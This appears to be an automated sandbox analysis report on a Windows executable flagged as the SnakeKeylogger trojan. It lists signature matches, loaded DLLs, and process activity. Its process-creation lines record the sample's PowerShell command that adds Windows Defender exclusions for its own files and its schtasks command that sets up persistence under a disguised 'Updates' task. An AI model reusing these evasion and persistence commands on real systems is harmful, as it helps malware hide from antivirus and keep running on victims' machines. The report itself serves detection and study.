Source: 00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: ZTEIhNCtP3.exe PID: 6164, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: ZTEIhNCtP3.exe PID: 6992, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: HgKRLOctZksk.exe PID: 5404, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: ZTEIhNCtP3.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HgKRLOctZksk.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack, --c.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack, --c.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack, m--t.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack, --c.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack, --c.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ZTEIhNCtP3.exe.41e3440.2.raw.unpack, m--t.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack, --c.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack, --c.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack, m--t.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, jT3T2CInaXkCOuraA6.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, jT3T2CInaXkCOuraA6.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, jT3T2CInaXkCOuraA6.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, OW4D23GkCsDqJk7dQY.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, OW4D23GkCsDqJk7dQY.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@20/20@5/6

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe

File created: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5204:120:WilError_03
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Mutant created: \Sessions\1\BaseNamedObjects\lHxtJCDnfQLIekcod

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe

File created: C:\Users\user\AppData\Local\Temp\tmp9D03.tmp

Jump to behavior

Source: ZTEIhNCtP3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ZTEIhNCtP3.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ZTEIhNCtP3.exe, 00000007.00000002.3347129750.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.00000000030F7000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000003104000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.0000000003623000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.0000000003632000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.0000000003663000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.0000000003614000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.0000000003657000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: ZTEIhNCtP3.exe	Virustotal: Detection: 62%
Source: ZTEIhNCtP3.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe

File read: C:\Users\user\Desktop\ZTEIhNCtP3.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ZTEIhNCtP3.exe "C:\Users\user\Desktop\ZTEIhNCtP3.exe"
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ZTEIhNCtP3.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmp9D03.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process created: C:\Users\user\Desktop\ZTEIhNCtP3.exe "C:\Users\user\Desktop\ZTEIhNCtP3.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmpAC55.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process created: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe "C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ZTEIhNCtP3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmp9D03.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process created: C:\Users\user\Desktop\ZTEIhNCtP3.exe "C:\Users\user\Desktop\ZTEIhNCtP3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmpAC55.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Process created: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe "C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: gpapi.dll	Jump to behavior
